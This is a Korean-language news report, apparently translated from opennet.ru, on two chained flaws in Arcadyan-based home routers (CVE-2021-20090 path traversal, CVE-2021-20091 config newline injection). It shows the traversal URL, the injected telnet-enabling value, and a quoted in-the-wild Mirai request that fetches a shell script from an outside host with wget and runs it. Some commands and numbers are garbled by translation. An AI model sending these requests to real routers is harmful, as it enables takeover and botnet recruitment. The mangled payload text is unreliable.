17๊ฐœ ์ œ์กฐ์—…์ฒด์— ์˜ํ–ฅ์„ ๋ฏธ์น˜๋Š” ํ™ˆ ๋ผ์šฐํ„ฐ์˜ ์ทจ์•ฝ์ 

Arcadyan ํšŒ์‚ฌ์˜ HTTP ์„œ๋ฒ„ ๊ตฌํ˜„์„ ์‚ฌ์šฉํ•˜๋Š” ํŽŒ์›จ์–ด๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ํ™ˆ ๋ผ์šฐํ„ฐ์— ๋Œ€ํ•œ ๋Œ€๊ทœ๋ชจ ๊ณต๊ฒฉ์ด ๋„คํŠธ์›Œํฌ์— ๊ธฐ๋ก๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์žฅ์น˜์— ๋Œ€ํ•œ ์ œ์–ด๊ถŒ์„ ์–ป๊ธฐ ์œ„ํ•ด ๋ฃจํŠธ ๊ถŒํ•œ์œผ๋กœ ์ž„์˜ ์ฝ”๋“œ์˜ ์›๊ฒฉ ์‹คํ–‰์„ ํ—ˆ์šฉํ•˜๋Š” ๋‘ ๊ฐ€์ง€ ์ทจ์•ฝ์ ์˜ ์กฐํ•ฉ์ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค. ์ด ๋ฌธ์ œ๋Š” Arcadyan, ASUS ๋ฐ Buffalo์˜ ์ƒ๋‹นํžˆ ๊ด‘๋ฒ”์œ„ํ•œ ADSL ๋ผ์šฐํ„ฐ๋ฟ๋งŒ ์•„๋‹ˆ๋ผ Beeline ๋ธŒ๋žœ๋“œ(Smart Box Flash์—์„œ ๋ฌธ์ œ๊ฐ€ ํ™•์ธ๋จ), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ๋ฐ ๋‹ค๋ฅธ ํ†ต์‹  ์‚ฌ์—…์ž. ์ด ๋ฌธ์ œ๋Š” Arcadyan ํŽŒ์›จ์–ด์— 10๋…„ ์ด์ƒ ์กด์žฌํ•ด ์™”์œผ๋ฉฐ ์ด ๊ธฐ๊ฐ„ ๋™์•ˆ 20๊ฐœ ์ œ์กฐ์—…์ฒด์˜ ์ตœ์†Œ 17๊ฐœ ์žฅ์น˜ ๋ชจ๋ธ๋กœ ๋งˆ์ด๊ทธ๋ ˆ์ด์…˜๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

์ฒซ ๋ฒˆ์งธ ์ทจ์•ฝ์ ์ธ CVE-2021-20090์€ ์ธ์ฆ ์—†์ด ๋ชจ๋“  ์›น ์ธํ„ฐํŽ˜์ด์Šค ์Šคํฌ๋ฆฝํŠธ์— ์•ก์„ธ์Šคํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค. ์ทจ์•ฝ์ ์˜ ๋ณธ์งˆ์€ ์›น ์ธํ„ฐํŽ˜์ด์Šค์—์„œ ์ด๋ฏธ์ง€, CSS ํŒŒ์ผ ๋ฐ JavaScript ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ์ „์†ก๋˜๋Š” ์ผ๋ถ€ ๋””๋ ‰ํ„ฐ๋ฆฌ์— ์ธ์ฆ ์—†์ด ์•ก์„ธ์Šคํ•  ์ˆ˜ ์žˆ๋‹ค๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค. ์ด ๊ฒฝ์šฐ, ์ธ์ฆ ์—†์ด ์ ‘๊ทผ์ด ํ—ˆ์šฉ๋œ ๋””๋ ‰ํ„ฐ๋ฆฌ๋Š” ์ดˆ๊ธฐ ๋งˆ์Šคํฌ๋ฅผ ํ†ตํ•ด ๊ฒ€์‚ฌ๋ฉ๋‹ˆ๋‹ค. ์ƒ์œ„ ๋””๋ ‰ํ„ฐ๋ฆฌ๋กœ ์ด๋™ํ•˜๋Š” ๊ฒฝ๋กœ์— "../" ๋ฌธ์ž๋ฅผ ์ง€์ •ํ•˜๋Š” ๊ฒƒ์€ ํŽŒ์›จ์–ด์— ์˜ํ•ด ์ฐจ๋‹จ๋˜์ง€๋งŒ "..%2f" ์กฐํ•ฉ ์‚ฌ์šฉ์€ ๊ฑด๋„ˆ๋œ๋‹ˆ๋‹ค. ๋”ฐ๋ผ์„œ "http://192.168.1.1/images/..%2findex.htm"๊ณผ ๊ฐ™์€ ์š”์ฒญ์„ ๋ณด๋‚ผ ๋•Œ ๋ณดํ˜ธ๋œ ํŽ˜์ด์ง€๋ฅผ ์—ด ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๋‘ ๋ฒˆ์งธ ์ทจ์•ฝ์ ์ธ CVE-2021-20091์€ ์ธ์ฆ๋œ ์‚ฌ์šฉ์ž๊ฐ€ ํŠน๋ณ„ํžˆ ํ˜•์‹ํ™”๋œ ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ apply_abstract.cgi ์Šคํฌ๋ฆฝํŠธ์— ์ „์†กํ•˜์—ฌ ์žฅ์น˜์˜ ์‹œ์Šคํ…œ ์„ค์ •์„ ๋ณ€๊ฒฝํ•  ์ˆ˜ ์žˆ๋„๋ก ํ—ˆ์šฉํ•ฉ๋‹ˆ๋‹ค. ์ด ์Šคํฌ๋ฆฝํŠธ๋Š” ๋งค๊ฐœ๋ณ€์ˆ˜์— ๊ฐœํ–‰ ๋ฌธ์ž๊ฐ€ ์žˆ๋Š”์ง€ ํ™•์ธํ•˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค. . ์˜ˆ๋ฅผ ๋“ค์–ด, ๊ณต๊ฒฉ์ž๋Š” ping ์ž‘์—…์„ ์ˆ˜ํ–‰ํ•  ๋•Œ /tmp/etc/config/ ์„ค์ • ํŒŒ์ผ ์ƒ์„ฑ ์‹œ ํ™•์ธ ์ค‘์ธ IP ์ฃผ์†Œ์™€ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ํฌํ•จ๋œ ํ•„๋“œ์— โ€œ192.168.1.2%0AARC_SYS_TelnetdEnable=1โ€ ๊ฐ’์„ ์ง€์ •ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. .glbcfg๋Š” ๋ฃจํŠธ ๊ถŒํ•œ์œผ๋กœ ๋ฌด์ œํ•œ ๋ช…๋ น ์…ธ ์•ก์„ธ์Šค๋ฅผ ์ œ๊ณตํ•˜๋Š” telnetd ์„œ๋ฒ„๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋Š” "AARC_SYS_TelnetdEnable=1" ํ–‰์„ "์— ์ž‘์„ฑํ•ฉ๋‹ˆ๋‹ค. ๋งˆ์ฐฌ๊ฐ€์ง€๋กœ AARC_SYS ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์„ค์ •ํ•˜๋ฉด ์‹œ์Šคํ…œ์—์„œ ๋ชจ๋“  ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ฒซ ๋ฒˆ์งธ ์ทจ์•ฝ์ ์€ โ€œ/images/..%2fapply_abstract.cgiโ€๋กœ ์ ‘๊ทผํ•˜์—ฌ ์ธ์ฆ ์—†์ด ๋ฌธ์ œ๊ฐ€ ์žˆ๋Š” ์Šคํฌ๋ฆฝํŠธ๋ฅผ ์‹คํ–‰ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค.

์ทจ์•ฝ์ ์„ ์•…์šฉํ•˜๋ ค๋ฉด ๊ณต๊ฒฉ์ž๊ฐ€ ์›น ์ธํ„ฐํŽ˜์ด์Šค๊ฐ€ ์‹คํ–‰ ์ค‘์ธ ๋„คํŠธ์›Œํฌ ํฌํŠธ์— ์š”์ฒญ์„ ๋ณด๋‚ผ ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ๊ณต๊ฒฉ ํ™•์‚ฐ์˜ ์—ญํ•™์œผ๋กœ ํŒ๋‹จํ•  ๋•Œ ๋งŽ์€ ์šด์˜์ž๋Š” ์ง€์› ์„œ๋น„์Šค์˜ ๋ฌธ์ œ ์ง„๋‹จ์„ ๋‹จ์ˆœํ™”ํ•˜๊ธฐ ์œ„ํ•ด ์™ธ๋ถ€ ๋„คํŠธ์›Œํฌ์—์„œ ์žฅ์น˜์— ๋Œ€ํ•œ ์•ก์„ธ์Šค ๊ถŒํ•œ์„ ๋‚จ๊ฒจ ๋‘ก๋‹ˆ๋‹ค. ์ธํ„ฐํŽ˜์ด์Šค์— ๋Œ€ํ•œ ์ ‘๊ทผ์ด ๋‚ด๋ถ€๋ง์œผ๋กœ๋งŒ ์ œํ•œ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ์—๋Š” 'DNS ๋ฆฌ๋ฐ”์ธ๋”ฉ' ๊ธฐ๋ฒ•์„ ์ด์šฉํ•ด ์™ธ๋ถ€๋ง์—์„œ๋„ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•˜๋‹ค. ๋ผ์šฐํ„ฐ๋ฅผ Mirai ๋ด‡๋„ท์— ์—ฐ๊ฒฐํ•˜๋Š” ๋ฐ ์ด๋ฏธ ์ทจ์•ฝ์ ์ด ํ™œ๋ฐœํ•˜๊ฒŒ ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค: POST /images/..%2fapply_abstract.cgi HTTP/1.1 ์—ฐ๊ฒฐ: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; ์ปฌ+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX

์ถœ์ฒ˜ : opennet.ru

์ฝ”๋ฉ˜ํŠธ๋ฅผ ์ถ”๊ฐ€